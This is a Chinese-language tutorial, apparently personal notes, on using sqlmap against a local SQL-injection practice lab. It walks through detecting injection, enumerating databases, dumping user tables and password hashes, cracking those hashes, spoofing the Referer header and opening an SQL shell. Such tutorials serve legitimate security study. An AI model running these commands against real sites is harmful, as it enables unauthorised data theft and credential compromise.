各个命令的用法
-h,--help Show basic help message and exit(显示基本帮助消息并退出)
-hh Show advanced help message and exit(显示高级帮助信息并退出)
--version Show program's version number and exit(显示程序的版本号并退出)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")(目标URL)
Sqlmap的用法(如果是get型注入可以直接输入url进行操作,如果是post注入的则需要用burp抓包将抓包的内容放在.txt文档里面用文档进行查询)
1.判断是否存在注入
python sqlmap.py -u http://127.0.0.3/Less-1/?id=1
也可以加入--batch
python sqlmap.py -u http://127.0.0.3/Less-1/?id=1 --batch
直接跳过是否的选择
python sqlmap.py -u “http://127.0.0.3/Less-1/?id=1&id=2” --batch
如果存在多个参数时要加双引号
如果存在注入type里面会显示注入类型
2.用.txt文件判断是否存在注入
python sqlmap.py -r C:\Users\gaoli\Desktop\2.txt
-p 可以去指定检测的参数
查看当前用户下存在的所有数据库(--dbs)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --dbs
获取当前数据库(--current-db)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --current-db
获取数据库中的表名(-D security(表示当前数据库名) --tables 这里是因为查到了当前数据库是security)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt -D security --tables
获取当前数据库表中的字段(–D security –T users --columns)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt -D security -T users --columns
获取字段的内容(-D security -T users -C id,usernmae,password --dump)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt -D security -T users -C id,usernmae,password --dump
-D database 数据库名 --dbs 查询数据库
-T table 表名 -D 数据库名 --tables
-C column 字段名 -D 数据库名 -T 表名 --columns
查询字段里面的内容 -D 数据库名 -T 表名 -C 字段名(username,password,id) --dump
获取数据库中所有的用户(--users)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --users
获取用户的密码(--passwords)
sqlmap>sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --passwords
这里的用户密码是加密了的可以用CMD5进行解密
--level 5:探测用户等级
参数 –level 5指需要执行的测试等级,一共有5个等级(1-5),可以不用加level,默认是1.sqlmap使用payload可以在xml/payloads.xml中看到,也可以根据相应的格式添加自己的payload,其中5级包含的payload最多,会自动破解出cookie、新方法、等头部注入。当然,level 5的运行速度也比较慢。
这个参数会影响测试的注入点,get和post的数据都会进行测试,http cookie在level为2的时候就会测试,http user-agent/referer头在level为3的时候就会测试。总之,在不确定哪个payload或者参数为诸如点时,为了保证全面性,建议使用高的level值。
查看当前用户是否为管理权限(--is-dba)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --is-dba
显示true表示当前用户是管理权限,显示false则表示当前用户没有管理权限
sqlmap可以在请求中伪造http中的referer,当level参数设定在3及3以上时,会尝试对referer头注入。可以使用referer命令来欺骗(--referer 百度一下,你就知道 )
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --referer http://www.baidu.com
用来欺骗是百度在执行
运行自定义sql语句(--sql-shell)
sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --sql-shell
sql-shell> 如果出现这个则证明已经执行成功
